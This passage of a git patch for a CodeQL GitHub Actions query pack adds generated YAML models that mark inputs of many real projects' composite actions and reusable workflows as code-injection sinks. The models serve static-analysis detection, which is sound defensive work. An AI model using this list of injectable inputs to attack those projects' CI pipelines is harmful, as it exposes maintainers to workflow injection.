@@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["wagoodman/dive", "*", "inputs.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml new file mode 100644 index 000000000000..1fd3ca1f0050 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["walletconnect/walletconnectswiftv2", "*", "inputs.js-client-api-host", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "inputs.project-id", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "inputs.relay-endpoint", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "inputs.gm-dapp-host", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "inputs.gm-dapp-project-secret", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "inputs.gm-dapp-project-id", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "inputs.explorer-endpoint", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "inputs.notify-endpoint", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml new file mode 100644 index 000000000000..727a21ac9602 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["wazuh/wazuh", "*", "inputs.target", "code-injection", "generated"] + - ["wazuh/wazuh", "*", "inputs.doxygen_config", "code-injection", "generated"] + - ["wazuh/wazuh", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml new file mode 100644 index 000000000000..fff6557dd410 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["web-infra-dev/rspack", "*", "inputs.post", "code-injection", "generated"] + - ["web-infra-dev/rspack", "*", "inputs.profile", "code-injection", "generated"] + - ["web-infra-dev/rspack", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml new file mode 100644 index 000000000000..e87c7cf5c06b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["webassembly/wabt", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml new file mode 100644 index 000000000000..9c556053d664 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["wntrblm/nox", "*", "inputs.python-versions", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml new file mode 100644 index 000000000000..6121c00ccfd3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["xrplf/rippled", "*", "inputs.configuration", "code-injection", "generated"] + - ["xrplf/rippled", "*", "inputs.cmake-target", "code-injection", "generated"] + - ["xrplf/rippled", "*", "inputs.cmake-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml new file mode 100644 index 000000000000..789bdb53aed2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zcash/zcash", "*", "inputs.destination", "code-injection", "generated"] + - ["zcash/zcash", "*", "inputs.remove-first-if-exists", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml new file mode 100644 index 000000000000..58389ad753e6 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zenml-io/zenml", "*", "inputs.install_integrations", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml new file mode 100644 index 000000000000..853948c5ec33 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zeroc-ice/ice", "*", "inputs.flags", "code-injection", "generated"] + - ["zeroc-ice/ice", "*", "inputs.make_flags", "code-injection", "generated"] \ No newline at end of file From 83f9527cc489194e143ca2e21c724a4b10ec954d Mon Sep 17 00:00:00 2001 From: jorgectf Date: Thu, 11 Apr 2024 11:25:54 +0200 Subject: [PATCH 164/707] Add models for reusable workflows sinks --- .../0xpolygon_polygon-edge.model.yml | 6 ++++ .../reusable-workflows/8vim_8vim.model.yml | 9 ++++++ .../actions_reusable-workflows.model.yml | 11 +++++++ .../reusable-workflows/adap_flower.model.yml | 8 +++++ .../aio-libs_multidict.model.yml | 7 +++++ .../aio-libs_yarl.model.yml | 7 +++++ .../airbytehq_airbyte.model.yml | 6 ++++ .../alphagov_collections.model.yml | 6 ++++ .../alphagov_frontend.model.yml | 6 ++++ .../alphagov_publishing-api.model.yml | 6 ++++ .../reusable-workflows/apache_druid.model.yml | 15 ++++++++++ .../reusable-workflows/apache_flink.model.yml | 7 +++++ .../reusable-workflows/apache_spark.model.yml | 7 +++++ .../argilla-io_argilla.model.yml | 6 ++++ .../argoproj_argo-cd.model.yml | 8 +++++ .../argoproj_argo-rollouts.model.yml | 8 +++++ .../aws-amplify_amplify-ui.model.yml | 6 ++++ .../reusable-workflows/azure_apiops.model.yml | 6 ++++ .../azure_mlops-templates.model.yml | 13 +++++++++ .../bbq-beets_avocaddo-cmw.model.yml | 9 ++++++ .../bbq-beets_mobile-ci-cd.model.yml | 9 ++++++ .../bbq-beets_yujincat-action.model.yml | 7 +++++ .../bdunderscore_modular-avatar.model.yml | 6 ++++ .../benc-uk_workflow-dispatch.model.yml | 6 ++++ .../bridgecrewio_checkov.model.yml | 8 +++++ .../bugsnag_bugsnag-ruby.model.yml | 6 ++++ ...ecodealliance_wasm-micro-runtime.model.yml | 22 ++++++++++++++ .../celo-org_celo-blockchain.model.yml | 7 +++++ .../cemu-project_cemu.model.yml | 6 ++++ .../cesiumgs_cesium-unreal.model.yml | 29 +++++++++++++++++++ .../reusable-workflows/cgal_cgal.model.yml | 6 ++++ .../checkstyle_checkstyle.model.yml | 14 +++++++++ .../chia-network_actions.model.yml | 7 +++++ .../chipsalliance_chisel.model.yml | 7 +++++ .../clickhouse_clickhouse.model.yml | 14 +++++++++ .../cloudfoundry_cli.model.yml | 6 ++++ .../cocotb_cocotb.model.yml | 8 +++++ .../codeigniter4_codeigniter4.model.yml | 9 ++++++ .../com-lihaoyi_mill.model.yml | 7 +++++ .../cosmos_ibc-go.model.yml | 17 +++++++++++ .../crowdsecurity_crowdsec.model.yml | 7 +++++ .../cryptomator_cryptomator.model.yml | 7 +++++ .../daeuniverse_dae.model.yml | 7 +++++ .../dafny-lang_dafny.model.yml | 9 ++++++ .../dagger_dagger.model.yml | 7 +++++ .../dash-industry-forum_dash.js.model.yml | 7 +++++ .../datadog_dd-trace-go.model.yml | 6 ++++ .../datadog_dd-trace-py.model.yml | 7 +++++ .../datafuselabs_databend.model.yml | 7 +++++ .../dbt-labs_dbt-bigquery.model.yml | 14 +++++++++ .../dbt-labs_dbt-core.model.yml | 9 ++++++ .../dbt-labs_dbt-snowflake.model.yml | 14 +++++++++ .../decidim_decidim.model.yml | 6 ++++ .../defectdojo_django-defectdojo.model.yml | 6 ++++ ...dependencytrack_dependency-track.model.yml | 6 ++++ .../devexpress_testcafe.model.yml | 10 +++++++ .../dfhack_dfhack.model.yml | 18 ++++++++++++ .../docker_build-push-action.model.yml | 7 +++++ .../dragonwell-project_dragonwell11.model.yml | 6 ++++ .../earthly_earthly.model.yml | 22 ++++++++++++++ .../eclipse-vertx_vert.x.model.yml | 6 ++++ .../eclipse-vertx_vertx-sql-client.model.yml | 6 ++++ .../elastic_elasticsearch-net.model.yml | 6 ++++ .../element-hq_element-desktop.model.yml | 11 +++++++ .../etcd-io_bbolt.model.yml | 7 +++++ .../reusable-workflows/etcd-io_etcd.model.yml | 9 ++++++ .../eventstore_eventstore.model.yml | 7 +++++ .../expensify_app.model.yml | 6 ++++ ...xternal-secrets_external-secrets.model.yml | 7 +++++ .../facebook_create-react-app.model.yml | 6 ++++ .../facebookresearch_xformers.model.yml | 15 ++++++++++ .../falcosecurity_falco.model.yml | 11 +++++++ .../fastify_fastify.model.yml | 6 ++++ .../ferretdb_ferretdb.model.yml | 6 ++++ .../filecoin-project_venus.model.yml | 9 ++++++ .../firebase_firebase-unity-sdk.model.yml | 19 ++++++++++++ .../flarum_framework.model.yml | 6 ++++ .../fluent_fluent-bit.model.yml | 13 +++++++++ .../flux-iac_tofu-controller.model.yml | 6 ++++ .../flyteorg_flyte.model.yml | 8 +++++ .../foundatiofx_foundatio.model.yml | 8 +++++ .../freecad_freecad.model.yml | 6 ++++ .../getpelican_pelican.model.yml | 8 +++++ .../getporter_porter.model.yml | 6 ++++ .../getsentry_sentry-dart.model.yml | 7 +++++ .../getsentry_sentry-unity.model.yml | 7 +++++ .../gitpod-io_gitpod.model.yml | 6 ++++ .../gittools_gitversion.model.yml | 6 ++++ ...ooglecloudplatform_magic-modules.model.yml | 6 ++++ ...loudplatform_nodejs-docs-samples.model.yml | 7 +++++ .../gravitational_teleport.model.yml | 6 ++++ .../gravitl_netmaker.model.yml | 6 ++++ .../reusable-workflows/h2oai_wave.model.yml | 8 +++++ .../hadashia_vcontainer.model.yml | 7 +++++ .../hashicorp_boundary.model.yml | 6 ++++ .../hashicorp_consul.model.yml | 7 +++++ .../hashicorp_terraform-cdk.model.yml | 15 ++++++++++ ...hashicorp_terraform-provider-tfe.model.yml | 6 ++++ .../hashicorp_terraform.model.yml | 9 ++++++ .../hashicorp_vault.model.yml | 16 ++++++++++ .../reusable-workflows/heroku_cli.model.yml | 7 +++++ .../hitobito_hitobito.model.yml | 7 +++++ .../home-assistant_operating-system.model.yml | 7 +++++ .../homuler_mediapipeunityplugin.model.yml | 11 +++++++ .../huggingface_doc-builder.model.yml | 14 +++++++++ .../huggingface_transformers.model.yml | 7 +++++ .../hyperion-project_hyperion.ng.model.yml | 8 +++++ .../reusable-workflows/ibm_sarama.model.yml | 6 ++++ ...nloader_icloud_photos_downloader.model.yml | 6 ++++ .../immich-app_immich.model.yml | 6 ++++ .../reusable-workflows/inria_spoon.model.yml | 6 ++++ ...el-device-plugins-for-kubernetes.model.yml | 6 ++++ .../inverse-inc_packetfence.model.yml | 6 ++++ .../reusable-workflows/ispc_ispc.model.yml | 6 ++++ ..._intellij-platform-gradle-plugin.model.yml | 6 ++++ .../jupyter_docker-stacks.model.yml | 13 +++++++++ .../kairos-io_kairos.model.yml | 23 +++++++++++++++ .../kanidm_kanidm.model.yml | 6 ++++ .../kata-containers_kata-containers.model.yml | 20 +++++++++++++ .../reusable-workflows/kiali_kiali.model.yml | 16 ++++++++++ .../kotest_kotest.model.yml | 6 ++++ .../kubernetes_ingress-nginx.model.yml | 7 +++++ .../kubescape_kubescape.model.yml | 9 ++++++ .../kubeshop_botkube.model.yml | 7 +++++ .../reusable-workflows/kumahq_kuma.model.yml | 9 ++++++ .../labring_sealos.model.yml | 15 ++++++++++ .../laion-ai_open-assistant.model.yml | 6 ++++ .../learningequality_kolibri.model.yml | 9 ++++++ .../lensesio_stream-reactor.model.yml | 6 ++++ .../leptos-rs_leptos.model.yml | 8 +++++ .../lightning-ai_pytorch-lightning.model.yml | 7 +++++ .../liquibase_liquibase.model.yml | 6 ++++ .../litestar-org_litestar.model.yml | 7 +++++ .../reusable-workflows/llvm_circt.model.yml | 13 +++++++++ .../lnbits_lnbits.model.yml | 6 ++++ .../lutris_lutris.model.yml | 6 ++++ .../reusable-workflows/mailu_mailu.model.yml | 8 +++++ .../mamba-org_mamba.model.yml | 7 +++++ ...anticoresoftware_manticoresearch.model.yml | 14 +++++++++ .../marcelotduarte_cx_freeze.model.yml | 6 ++++ ...xaml_materialdesigninxamltoolkit.model.yml | 9 ++++++ .../matter-labs_zksync-era.model.yml | 7 +++++ .../mattermost_desktop.model.yml | 6 ++++ .../mattermost_mattermost.model.yml | 10 +++++++ .../mealie-recipes_mealie.model.yml | 6 ++++ .../meshery_meshery.model.yml | 16 ++++++++++ .../meshtastic_firmware.model.yml | 10 +++++++ .../microcks_microcks.model.yml | 6 ++++ ...crosoft_applicationinsights-java.model.yml | 6 ++++ .../microsoft_chat-copilot.model.yml | 11 +++++++ .../microsoft_msquic.model.yml | 18 ++++++++++++ .../microsoft_oryx.model.yml | 6 ++++ .../microsoft_pr-metrics.model.yml | 6 ++++ ...oft_react-native-windows-samples.model.yml | 13 +++++++++ .../microsoft_vscode-cpptools.model.yml | 6 ++++ .../moby_buildkit.model.yml | 10 +++++++ .../reusable-workflows/moby_moby.model.yml | 7 +++++ .../mosaicml_composer.model.yml | 11 +++++++ .../msys2_setup-msys2.model.yml | 7 +++++ .../mudler_localai.model.yml | 7 +++++ .../mustardchef_wsabuilds.model.yml | 15 ++++++++++ .../reusable-workflows/n8n-io_n8n.model.yml | 6 ++++ .../napari_napari.model.yml | 6 ++++ .../reusable-workflows/nasa_fprime.model.yml | 9 ++++++ .../nautobot_nautobot.model.yml | 6 ++++ .../reusable-workflows/nektos_act.model.yml | 13 +++++++++ .../neovim_neovim.model.yml | 6 ++++ .../nethermindeth_nethermind.model.yml | 11 +++++++ .../newrelic_newrelic-dotnet-agent.model.yml | 10 +++++++ .../newrelic_newrelic-java-agent.model.yml | 7 +++++ .../newrelic_node-newrelic.model.yml | 9 ++++++ .../nexus-mods_nexusmods.app.model.yml | 9 ++++++ .../nginxinc_kubernetes-ingress.model.yml | 16 ++++++++++ .../nocodb_nocodb.model.yml | 7 +++++ .../reusable-workflows/novuhq_novu.model.yml | 20 +++++++++++++ .../npm_abbrev-js.model.yml | 6 ++++ .../reusable-workflows/npm_cli.model.yml | 7 +++++ .../npm_fs-minipass.model.yml | 6 ++++ .../npm_hosted-git-info.model.yml | 6 ++++ .../reusable-workflows/npm_ini.model.yml | 6 ++++ ...pm_json-parse-even-better-errors.model.yml | 6 ++++ .../npm_minify-registry-metadata.model.yml | 6 ++++ .../npm_mute-stream.model.yml | 6 ++++ .../npm_node-semver.model.yml | 6 ++++ .../npm_node-which.model.yml | 6 ++++ .../reusable-workflows/npm_nopt.model.yml | 6 ++++ .../npm_normalize-package-data.model.yml | 6 ++++ .../npm_write-file-atomic.model.yml | 6 ++++ .../onflow_cadence.model.yml | 9 ++++++ .../open-goal_jak-project.model.yml | 11 +++++++ ...pen-telemetry_opentelemetry-demo.model.yml | 6 ++++ ...try_opentelemetry-dotnet-contrib.model.yml | 7 +++++ ...n-telemetry_opentelemetry-dotnet.model.yml | 7 +++++ ...entelemetry-java-instrumentation.model.yml | 7 +++++ ...lemetry_opentelemetry-js-contrib.model.yml | 6 ++++ ...telemetry_opentelemetry-operator.model.yml | 8 +++++ .../openbao_openbao.model.yml | 11 +++++++ .../openhab_openhab-docs.model.yml | 9 ++++++ .../openmined_pysyft.model.yml | 7 +++++ .../opentofu_opentofu.model.yml | 9 ++++++ .../openttd_openttd.model.yml | 17 +++++++++++ .../openvinotoolkit_openvino.model.yml | 6 ++++ .../reusable-workflows/openxla_iree.model.yml | 12 ++++++++ .../reusable-workflows/openzfs_zfs.model.yml | 6 ++++ ...ator-framework_java-operator-sdk.model.yml | 8 +++++ .../orange-opensource_hurl.model.yml | 6 ++++ ...aolosalvatori_servicebusexplorer.model.yml | 7 +++++ .../parcel-bundler_parcel.model.yml | 6 ++++ .../pardeike_harmony.model.yml | 6 ++++ .../reusable-workflows/pcsx2_pcsx2.model.yml | 12 ++++++++ .../pennylaneai_pennylane.model.yml | 8 +++++ ...necone-io_pinecone-python-client.model.yml | 6 ++++ .../pixie-io_pixie.model.yml | 8 +++++ .../plantuml_plantuml.model.yml | 6 ++++ .../powerdns_pdns.model.yml | 8 +++++ .../preactjs_preact.model.yml | 7 +++++ .../prismlauncher_prismlauncher.model.yml | 6 ++++ .../product-os_flowzone.model.yml | 6 ++++ .../project-oak_oak.model.yml | 7 +++++ .../reusable-workflows/prql_prql.model.yml | 6 ++++ .../pulumi_pulumi.model.yml | 10 +++++++ .../puppetlabs_puppetlabs-puppetdb.model.yml | 8 +++++ .../reusable-workflows/pyo3_maturin.model.yml | 6 ++++ .../reusable-workflows/pyo3_pyo3.model.yml | 6 ++++ .../python_cpython.model.yml | 7 +++++ .../pytorch_botorch.model.yml | 6 ++++ .../reusable-workflows/pytorch_xla.model.yml | 6 ++++ .../quarto-dev_quarto-cli.model.yml | 6 ++++ .../rancher_dashboard.model.yml | 9 ++++++ .../rasterio_rasterio.model.yml | 6 ++++ .../redisearch_redisearch.model.yml | 6 ++++ .../remix-run_remix.model.yml | 6 ++++ .../rmcrackan_libation.model.yml | 9 ++++++ .../rocketchat_rocket.chat.model.yml | 6 ++++ .../ruby_ruby.wasm.model.yml | 6 ++++ .../rustdesk_rustdesk.model.yml | 8 +++++ .../saadeghi_daisyui.model.yml | 7 +++++ .../sagemath_sage.model.yml | 12 ++++++++ .../schemastore_schemastore.model.yml | 7 +++++ .../scikit-learn_scikit-learn.model.yml | 6 ++++ .../seleniumhq_selenium.model.yml | 7 +++++ .../shaka-project_shaka-packager.model.yml | 8 +++++ .../shaka-project_shaka-player.model.yml | 9 ++++++ .../shimataro_ssh-key-action.model.yml | 6 ++++ .../softfever_orcaslicer.model.yml | 7 +++++ ...-mansion_react-native-reanimated.model.yml | 6 ++++ .../solana-labs_solana.model.yml | 6 ++++ .../sonarr_sonarr.model.yml | 7 +++++ .../speedb-io_speedb.model.yml | 7 +++++ ...ring-cloud_spring-cloud-dataflow.model.yml | 6 ++++ .../sqlfluff_sqlfluff.model.yml | 8 +++++ .../stdlib-js_stdlib.model.yml | 9 ++++++ .../stereokit_stereokit.model.yml | 10 +++++++ .../streetsidesoftware_cspell.model.yml | 6 ++++ .../supabase_auth.model.yml | 6 ++++ .../reusable-workflows/supabase_cli.model.yml | 6 ++++ .../tencent_hippy.model.yml | 9 ++++++ .../tgstation_tgstation.model.yml | 8 +++++ .../thesofproject_sof.model.yml | 6 ++++ .../tiann_kernelsu.model.yml | 8 +++++ .../tiledb-inc_tiledb.model.yml | 7 +++++ .../toeverything_affine.model.yml | 6 ++++ .../tracel-ai_burn.model.yml | 6 ++++ .../tribler_tribler.model.yml | 6 ++++ .../ubisoft_sharpmake.model.yml | 7 +++++ .../unity-technologies_ml-agents.model.yml | 6 ++++ .../reusable-workflows/urbit_urbit.model.yml | 7 +++++ .../uyuni-project_uyuni.model.yml | 7 +++++ .../vert-x3_vertx-hazelcast.model.yml | 7 +++++ .../reusable-workflows/vkcom_vkui.model.yml | 6 ++++ .../walletconnect_web3modal.model.yml | 6 ++++ .../warzone2100_warzone2100.model.yml | 6 ++++ .../wasmedge_wasmedge.model.yml | 10 +++++++ .../web-infra-dev_rspack.model.yml | 7 +++++ .../reusable-workflows/werf_werf.model.yml | 21 ++++++++++++++ .../widdix_aws-cf-templates.model.yml | 6 ++++ .../wildfly_wildfly.model.yml | 9 ++++++ .../yt-dlp_yt-dlp.model.yml | 11 +++++++ .../zenml-io_zenml.model.yml | 8 +++++ .../zephyrproject-rtos_zephyr.model.yml | 6 ++++ .../zitadel_zitadel.model.yml | 9 ++++++ 281 files changed, 2322 insertions(+) create mode 100644 ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml create mode 100644 